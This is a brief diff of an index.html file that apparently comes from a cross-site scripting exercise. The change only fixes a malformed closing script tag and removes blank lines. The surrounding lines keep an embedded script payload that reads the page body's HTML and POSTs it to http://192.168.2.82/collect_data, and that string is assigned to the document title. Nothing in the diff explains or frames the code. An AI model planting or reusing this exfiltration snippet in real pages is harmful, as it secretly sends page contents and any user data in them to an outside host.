--- a/index.html
+++ b/index.html
@@ -7,8 +7,7 @@
    		var script_title="<script> var data=document.body.innerHTML; var xhr = new XMLHttpRequest(); xhr.open(\"POST\", \"http://192.168.2.82/collect_data?flag=data\",true); xhr.send() <//script>";
    		document.title=script_title;
 
-
-   	</script>>
+   	</script>
   </head>
 
   <body>
